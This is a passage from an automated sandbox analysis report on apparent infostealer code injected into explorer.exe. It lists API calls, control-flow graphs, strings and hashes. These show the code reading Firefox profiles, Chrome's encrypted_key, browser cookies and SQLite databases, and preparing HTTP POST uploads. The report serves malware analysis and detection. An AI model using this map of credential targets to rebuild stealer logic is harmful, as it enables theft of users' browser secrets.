                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 029729E1
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 029729EC
                                                                                                                          • wsprintfA.USER32 ref: 02972A38
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02972A44
                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 02972A6C
                                                                                                                          • lstrlen.KERNEL32(00000000,?,?), ref: 02972A99
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                                                                          • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                                                                          • API String ID: 304071051-2605711689
                                                                                                                          • Opcode ID: 7204196fca3e20d9a68583addbdec2b31fa8fb386ded9a64eb5ef24816488adc
                                                                                                                          • Instruction ID: 423fb8f641657fdd6fd931e5f96a34824bb4f524057629e13a26e61748f64e47
                                                                                                                          • Opcode Fuzzy Hash: 7204196fca3e20d9a68583addbdec2b31fa8fb386ded9a64eb5ef24816488adc
                                                                                                                          • Instruction Fuzzy Hash: 76519030A083469BD729EF31D990A3F77EEAFC5745F04482DF8899B251DB35D8058B62

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 484 2972cb5-2972cc7 call 2971953 488 2972e17-2972e2d call 2972ae9 484->488 489 2972ccd-2972d06 call 2971953 call 2971000 * 2 call 2971b6a 484->489 500 2972d0c-2972d1c GetPrivateProfileSectionNamesW 489->500 501 2972df9-2972e12 call 2971011 * 4 489->501 500->501 503 2972d22-2972d26 500->503 501->488 505 2972df5 503->505 506 2972d2c-2972d32 503->506 505->501 508 2972d36-2972d39 506->508 509 2972d3f-2972d4d StrStrIW 508->509 510 2972ded-2972df1 508->510 512 2972dd7-2972de7 lstrlenW 509->512 513 2972d53-2972d70 GetPrivateProfileStringW 509->513 510->505 512->508 512->510 513->512 515 2972d72-2972d88 GetPrivateProfileIntW 513->515 517 2972dcc-2972dd2 call 2972ae9 515->517 518 2972d8a-2972d9c call 2971953 515->518 517->512 523 2972db4-2972dca call 2972ae9 call 2971011 518->523 524 2972d9e-2972da2 518->524 523->512 525 2972da4-2972daa 524->525 526 2972dac-2972db2 524->526 525->526 526->523 526->524
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02971953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02972F0C), ref: 02971973
                                                                                                                            • Part of subcall function 02971953: lstrlenW.KERNEL32(029C6564,?,?,02972F0C), ref: 02971978
                                                                                                                            • Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,?,?,?,02972F0C), ref: 02971990
                                                                                                                            • Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,029C6564,?,?,02972F0C), ref: 02971994
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                            • Part of subcall function 02971B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02972893,00000000,00000000,00000000,?), ref: 02971B82
                                                                                                                            • Part of subcall function 02971B6A: CloseHandle.KERNELBASE(00000000), ref: 02971B8F
                                                                                                                          • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 02972D13
                                                                                                                          • StrStrIW.SHLWAPI(00000000,Profile), ref: 02972D45
                                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,Path,029C637C,?,00000FFF,?), ref: 02972D68
                                                                                                                          • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 02972D7B
                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 02972DD8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                                                                          • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                                          • API String ID: 2234428054-4107377610
                                                                                                                          • Opcode ID: 4d185cc22bd0fd1be427211af5ad4e04eb6f11182e5d1e8fc66def55034a1e96
                                                                                                                          • Instruction ID: 7e7e331aeb80b361bce1b4db68b482d11d33102b9c09b908f3668b135c1204cb
                                                                                                                          • Opcode Fuzzy Hash: 4d185cc22bd0fd1be427211af5ad4e04eb6f11182e5d1e8fc66def55034a1e96
                                                                                                                          • Instruction Fuzzy Hash: 09319230F583429BD714AF70985063F77ABAFC9700F10482EED4AAB281DF758946DB52

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 576 2971333-2971385 call 2971000 call 297106c call 29712a3 583 2971387-297139e 576->583 584 29713a0-29713a3 576->584 587 29713b0-29713b2 583->587 586 29713aa-29713ac 584->586 586->587 588 29715cb-29715da call 2971011 587->588 589 29713b8-29713ef RtlZeroMemory 587->589 593 29713f5-297141a 589->593 594 29715c3-29715ca 589->594 597 2971420-2971456 call 29710b1 593->597 598 29715bf 593->598 594->588 601 297145d-2971478 597->601 602 2971458 597->602 598->594 604 29715b5 601->604 605 297147e-2971483 601->605 602->601 604->598 606 2971485-2971496 605->606 607 297149d-29714c7 call 2971000 wsprintfW 605->607 606->607 610 29714e0-2971509 607->610 611 29714c9-29714cb 607->611 618 29715a5-29715b0 call 2971011 610->618 619 297150f-297151b 610->619 612 29714cc-29714cf 611->612 614 29714d1-29714d6 612->614 615 29714da-29714dc 612->615 614->612 616 29714d8 614->616 615->610 616->610 618->604 619->618 622 2971521-2971537 call 2971000 619->622 626 2971539-2971544 622->626 627 2971546-2971553 call 297102f 626->627 628 2971558-297156f 626->628 627->628 632 2971573-297157d 628->632 633 2971571 628->633 632->626 634 297157f-2971583 632->634 633->632 635 2971585 call 297104c 634->635 636 297159a-29715a1 call 2971011 634->636 639 297158a-2971594 RtlMoveMemory 635->639 636->618 639->636
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                            • Part of subcall function 0297106C: lstrlen.KERNEL32(02CF70DE,00000000,00000000,00000000,02971366,774C8A60,02CF70DE,00000000), ref: 02971074
                                                                                                                            • Part of subcall function 0297106C: MultiByteToWideChar.KERNEL32(00000000,00000000,02CF70DE,00000001,00000000,00000000), ref: 02971086
                                                                                                                            • Part of subcall function 029712A3: RtlZeroMemory.NTDLL(?,00000018), ref: 029712B5
                                                                                                                          • RtlZeroMemory.NTDLL(?,0000003C), ref: 029713C2
                                                                                                                          • wsprintfW.USER32 ref: 029714B5
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02971594
                                                                                                                          Strings
                                                                                                                          • POST, xrefs: 02971465
                                                                                                                          • Accept: */*Referer: %S, xrefs: 029714AF
                                                                                                                          • Content-Type: application/x-www-form-urlencoded, xrefs: 029714FB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                          • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                          • API String ID: 3833683434-704803497
                                                                                                                          • Opcode ID: a1f9ef08776a23f69268c9c87c80defb5ee6957db8f90374c527ca8fbf710088
                                                                                                                          • Instruction ID: bdd996bc492290b3248d924767d197a8ca54b9122ed9095133d9ee5cb594b5ac
                                                                                                                          • Opcode Fuzzy Hash: a1f9ef08776a23f69268c9c87c80defb5ee6957db8f90374c527ca8fbf710088
                                                                                                                          • Instruction Fuzzy Hash: 547136B1A08341AFD7149F68D884A2BBBEEEBC8355F10492DF999D3251DB70DA048B52

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 667 297b1e5-297b20b 668 297b221-297b22a 667->668 669 297b20d-297b218 call 297aeea 667->669 671 297b240-297b243 668->671 672 297b22c-297b237 call 297ae65 668->672 679 297b21e 669->679 680 297b3ea-297b3f0 669->680 675 297b3b9-297b3d3 671->675 676 297b249-297b26b call 297a7ae 671->676 685 297b3b4-297b3b7 672->685 686 297b23d 672->686 678 297b3db-297b3df 675->678 687 297b296-297b29f 676->687 688 297b26d-297b278 676->688 683 297b3e1-297b3e3 678->683 684 297b3e8 678->684 679->668 683->684 690 297b3e5-297b3e7 683->690 684->680 685->675 689 297b3d5-297b3d8 685->689 686->671 692 297b2d6-297b2ea call 2976a5a 687->692 693 297b2a1 687->693 691 297b27d-297b291 call 297a1c6 688->691 689->678 690->684 691->685 700 297b2f6-297b2fd 692->700 701 297b2ec-297b2f1 692->701 695 297b2a3-297b2a7 693->695 696 297b2a9-297b2ad 693->696 695->692 695->696 696->685 699 297b2b3-297b2b9 call 297a67c 696->699 707 297b2be-297b2c2 699->707 704 297b373 700->704 705 297b2ff-297b30e 700->705 701->685 708 297b377-297b37a 704->708 705->708 707->692 709 297b2c4-297b2d4 707->709 710 297b310-297b329 CreateFileMappingW 708->710 711 297b37c 708->711 709->691 712 297b37e-297b3ab call 297a1c6 710->712 713 297b32b-297b357 MapViewOfFile 710->713 711->685 712->685 718 297b3ad 712->718 713->712 714 297b359-297b370 713->714 714->704 718->685
                                                                                                                          APIs
                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 0297B31D
                                                                                                                          • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 0297B34F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CreateMappingView
                                                                                                                          • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                                          • API String ID: 3452162329-3826999013
                                                                                                                          • Opcode ID: 712b5cd0960aebcbfee9f545f16737d77a73617ea5e03d6fb7b9d5598140b334
                                                                                                                          • Instruction ID: 891e0a5bca5d7c31170faf7e02acc2099d0693999187ca19e70022225d4f611d
                                                                                                                          • Opcode Fuzzy Hash: 712b5cd0960aebcbfee9f545f16737d77a73617ea5e03d6fb7b9d5598140b334
                                                                                                                          • Instruction Fuzzy Hash: D951B271605701DFE725CF18C8A4A6B77EAFF94318F10892EE9868B290EB70E855CB51

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 719 297a40e-297a424 720 297a426-297a42a 719->720 721 297a4a2-297a4aa 719->721 723 297a431-297a441 720->723 724 297a42c-297a42f 720->724 722 297a4ae-297a4c8 721->722 725 297a4cc-297a4e3 ReadFile 722->725 726 297a443 723->726 727 297a469-297a4a0 memcpy 723->727 724->721 724->723 730 297a4e5-297a4ee 725->730 731 297a524-297a538 call 297a2aa 725->731 728 297a445-297a448 726->728 729 297a44a-297a45a memcpy 726->729 727->722 728->727 728->729 732 297a45d 729->732 730->731 738 297a4f0-297a4ff call 297a250 730->738 731->732 737 297a53e-297a553 memset 731->737 734 297a45f-297a466 732->734 737->734 738->725 741 297a501-297a51f call 297a1c6 738->741 741->734
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$FileReadmemset
                                                                                                                          • String ID: winRead
                                                                                                                          • API String ID: 2051157613-2759563040
                                                                                                                          • Opcode ID: 1c8fc59c67466b60cfef149f87a8d58a19df8bf98ac33690c3a334948e463d7d
                                                                                                                          • Instruction ID: e5c4b434af31f84960b2b0764ca6fd20a5e77140ff7c364c890e804e6cab6e4b
                                                                                                                          • Opcode Fuzzy Hash: 1c8fc59c67466b60cfef149f87a8d58a19df8bf98ac33690c3a334948e463d7d
                                                                                                                          • Instruction Fuzzy Hash: 7B318972609341AFD750DE68CC849AFB7EAEFC8310F845928F99997250E731ED048B92

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • StrStrIW.KERNELBASE(?,?), ref: 02972E4B
                                                                                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 02972EE4
                                                                                                                          • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02972F54
                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 02972F62
                                                                                                                            • Part of subcall function 029719E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A1E
                                                                                                                            • Part of subcall function 029719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A3C
                                                                                                                            • Part of subcall function 029719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A75
                                                                                                                            • Part of subcall function 029719E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A98
                                                                                                                            • Part of subcall function 02971BC5: lstrlenW.KERNEL32(00000000,00000000,?,02972E75,PathToExe,00000000,00000000), ref: 02971BCC
                                                                                                                            • Part of subcall function 02971BC5: StrStrIW.SHLWAPI(00000000,.exe,?,02972E75,PathToExe,00000000,00000000), ref: 02971BF0
                                                                                                                            • Part of subcall function 02971BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02972E75,PathToExe,00000000,00000000), ref: 02971C05
                                                                                                                            • Part of subcall function 02971BC5: lstrlenW.KERNEL32(00000000,?,02972E75,PathToExe,00000000,00000000), ref: 02971C1C
                                                                                                                            • Part of subcall function 02971AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02972E83,PathToExe,00000000,00000000), ref: 02971B16
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                                                          • String ID: PathToExe
                                                                                                                          • API String ID: 1799103994-1982016430
                                                                                                                          • Opcode ID: fdb69995940fa37cb4bdc9b0ccadf34b6a617a35de2facc13acf7ae4569dc745
                                                                                                                          • Instruction ID: 747d803070dcadb0054de66b4432ad5af547406cc11ee304a89408710d84bd47
                                                                                                                          • Opcode Fuzzy Hash: fdb69995940fa37cb4bdc9b0ccadf34b6a617a35de2facc13acf7ae4569dc745
                                                                                                                          • Instruction Fuzzy Hash: 17317E71A14211AF9B19AF21C804D7F7AAAEFC5750F04452CFC5997240EF34C906DFA1

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 782 297a67c-297a692 783 297a694-297a6bf _alldiv _allmul 782->783 784 297a6c1-297a6c4 782->784 785 297a6c7-297a6d2 call 297a33b 783->785 784->785 788 297a6d4-297a6df 785->788 789 297a6f0-297a6fb SetEndOfFile 785->789 792 297a6e4-297a6ee call 297a1c6 788->792 790 297a71e 789->790 791 297a6fd-297a708 789->791 793 297a722-297a726 790->793 791->790 799 297a70a-297a71c 791->799 792->793 796 297a73a-297a740 793->796 797 297a728-297a72b 793->797 797->796 800 297a72d 797->800 799->792 801 297a734-297a737 800->801 802 297a72f-297a732 800->802 801->796 802->796 802->801
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File_alldiv_allmul
                                                                                                                          • String ID: winTruncate1$winTruncate2
                                                                                                                          • API String ID: 3568847005-470713972
                                                                                                                          • Opcode ID: 6f85fe0286353d0bcf80a26ff621ed80e2ad59727c8f69d3cd6a636f3782e34a
                                                                                                                          • Instruction ID: f05ad8fa19b91224c033e436e9eb0ecb4fe46d14a2cc4d80c226326558249345
                                                                                                                          • Opcode Fuzzy Hash: 6f85fe0286353d0bcf80a26ff621ed80e2ad59727c8f69d3cd6a636f3782e34a
                                                                                                                          • Instruction Fuzzy Hash: A121CD72601200ABDB148E6DCC94EAB77AEEFC4310F11856DFD08DB284D735E810CBA1
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                          • wsprintfW.USER32 ref: 02974AA2
                                                                                                                          • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 02974AC7
                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 02974AD4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                                                          • String ID: %s\%08x$Software
                                                                                                                          • API String ID: 1800864259-1658101971
                                                                                                                          • Opcode ID: 261bf6212797c48b862102ddb2a785762dc89ca95335d732ae0cf0ae173ff68a
                                                                                                                          • Instruction ID: 1f9509a412630707e189d05386dc4e9eb2a739aec206fad3c79cb9c531bf0f33
                                                                                                                          • Opcode Fuzzy Hash: 261bf6212797c48b862102ddb2a785762dc89ca95335d732ae0cf0ae173ff68a
                                                                                                                          • Instruction Fuzzy Hash: 37014271A04008BFAB08DF84DC8ADBF77BDEB80354B50007EF505A3100EBB02E40A661
                                                                                                                          APIs
                                                                                                                          • _alloca_probe.NTDLL ref: 0297431C
                                                                                                                          • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 02974335
                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 02974363
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 029743C8
                                                                                                                            • Part of subcall function 02971953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02972F0C), ref: 02971973
                                                                                                                            • Part of subcall function 02971953: lstrlenW.KERNEL32(029C6564,?,?,02972F0C), ref: 02971978
                                                                                                                            • Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,?,?,?,02972F0C), ref: 02971990
                                                                                                                            • Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,029C6564,?,?,02972F0C), ref: 02971994
                                                                                                                            • Part of subcall function 0297418A: wsprintfW.USER32 ref: 02974212
                                                                                                                            • Part of subcall function 02971011: GetProcessHeap.KERNEL32(00000000,00000000,?,02971A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2), ref: 02971020
                                                                                                                            • Part of subcall function 02971011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971027
                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 029743B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 801677237-0
                                                                                                                          • Opcode ID: 2b48996f9b015f109b2a244e207ed826e4c5c1b7228c3dd1aeb3e10d5a8413dc
                                                                                                                          • Instruction ID: 959361031ef6f1d7dfb6ffb7365fc0c49571a2943af64929b2363172d20690ab
                                                                                                                          • Opcode Fuzzy Hash: 2b48996f9b015f109b2a244e207ed826e4c5c1b7228c3dd1aeb3e10d5a8413dc
                                                                                                                          • Instruction Fuzzy Hash: 86113DB1508201AFE715DB21DC48DBF77EDEBC8354F004A2EB989E2150EB74AD589A62
                                                                                                                          APIs
                                                                                                                          • memset.NTDLL ref: 0297B8D5
                                                                                                                          • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0297B96F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFilememset
                                                                                                                          • String ID: psow$winOpen
                                                                                                                          • API String ID: 2416746761-4101858489
                                                                                                                          • Opcode ID: e8da2e7042635511c6b066b9c54573063a661a068d76318c58969f8aaf542bfe
                                                                                                                          • Instruction ID: d50fed2e7a5a52f9440ea55de54717cb174673295009b60bfc706a053737dabc
                                                                                                                          • Opcode Fuzzy Hash: e8da2e7042635511c6b066b9c54573063a661a068d76318c58969f8aaf542bfe
                                                                                                                          • Instruction Fuzzy Hash: A7717F71A087029FD710EF29C89175ABBE5FF88728F104A2DF8A897280D774D954CF92
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A1E
                                                                                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A3C
                                                                                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A75
                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A98
                                                                                                                            • Part of subcall function 02971011: GetProcessHeap.KERNEL32(00000000,00000000,?,02971A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2), ref: 02971020
                                                                                                                            • Part of subcall function 02971011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971027
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 217796345-0
                                                                                                                          • Opcode ID: 953dbd10ea63d10c9a5ac2910b3572241d18e4e2b44c249ea53033eff0dca767
                                                                                                                          • Instruction ID: ba02f8a8d173de1a9574daa9ec71762b823c41989c883d2a5d0364849de75b4c
                                                                                                                          • Opcode Fuzzy Hash: 953dbd10ea63d10c9a5ac2910b3572241d18e4e2b44c249ea53033eff0dca767
                                                                                                                          • Instruction Fuzzy Hash: B521B5726093416FEB298A21DD04F7BB7EDEFC9B58F140A2DF98DA2140E721C9448731
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyW.ADVAPI32(?,?,?), ref: 02971ED5
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                          • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02971F0C
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 02971F98
                                                                                                                            • Part of subcall function 02971953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02972F0C), ref: 02971973
                                                                                                                            • Part of subcall function 02971953: lstrlenW.KERNEL32(029C6564,?,?,02972F0C), ref: 02971978
                                                                                                                            • Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,?,?,?,02972F0C), ref: 02971990
                                                                                                                            • Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,029C6564,?,?,02972F0C), ref: 02971994
                                                                                                                          • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02971F82
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1077800024-0
                                                                                                                          • Opcode ID: 3ada1bb496fd31945e45bfbd793a76ce63241292e2d1aaedd4f22cd80035262a
                                                                                                                          • Instruction ID: 659e0020da7ba2a7001c605651eeec8b5ae955fa61cc5f6c0d2fab382eba2d7e
                                                                                                                          • Opcode Fuzzy Hash: 3ada1bb496fd31945e45bfbd793a76ce63241292e2d1aaedd4f22cd80035262a
                                                                                                                          • Instruction Fuzzy Hash: BD215971608341AFD7099B21DC48E3FBBEEEFC9354F00892DF899A2250DB75C9159B22
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02973E1E,00000000,?,02973FA8), ref: 02971C46
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00000000,?,02973FA8), ref: 02971C56
                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,02973FA8), ref: 02971C91
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,02973FA8), ref: 02971C76
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2517252058-0
                                                                                                                          • Opcode ID: 9fde7c6df7796c44648614c18ede446c1d7a211e28932b3de015119eefa8bf83
                                                                                                                          • Instruction ID: ac12e058b2c1ff65c8f7091b1b9bcb25b6275e49fa55d7089c265b81562826a7
                                                                                                                          • Opcode Fuzzy Hash: 9fde7c6df7796c44648614c18ede446c1d7a211e28932b3de015119eefa8bf83
                                                                                                                          • Instruction Fuzzy Hash: 83F0C8322042187BD2245A66DC88E7B7A5CEB876FAF260719F519A21C0DB1258155571
                                                                                                                          APIs
                                                                                                                          • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,02973E30,00000000,00000000,?,02973FA8), ref: 02972FC1
                                                                                                                          • lstrlen.KERNEL32("encrypted_key":",?,02973FA8), ref: 02972FCE
